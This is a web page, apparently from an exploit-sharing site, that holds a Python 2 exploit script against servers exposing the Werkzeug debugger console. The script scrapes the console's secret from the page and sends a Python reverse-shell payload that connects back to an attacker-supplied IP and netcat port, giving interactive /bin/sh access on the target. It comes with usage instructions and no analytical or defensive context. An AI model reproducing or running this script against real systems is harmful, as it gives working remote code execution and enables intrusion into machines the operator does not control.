扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 |
#!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''' % (sys.argv[3],sys.argv[4]) __debugger__ = 'yes' frm = '0' response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) secret = re.findall("[0-9a-zA-Z]{20}",response.text) if len(secret) != 1: print "[-] Impossible to get SECRET" sys.exit(-1) else: secret = secret[0] print "[+] SECRET is: "+str(secret) # shell print "[+] Sending reverse shell to %s:%s, pleaseuse netcat listening in %s:%s" % (sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4]) raw_input("PRESS ENTER TO EXPLOIT") data = { '__debugger__' : __debugger__, 'cmd' : str(cmd), 'frm' : frm, 's' : secret } response = requests.get("http://%s:%s/console" % (sys.argv[1],sys.argv[2]), params=data,headers=response.headers) print "[+] response from server" print "status code: " + str(response.status_code) print "response: "+ str(response.text) |
体验盒子
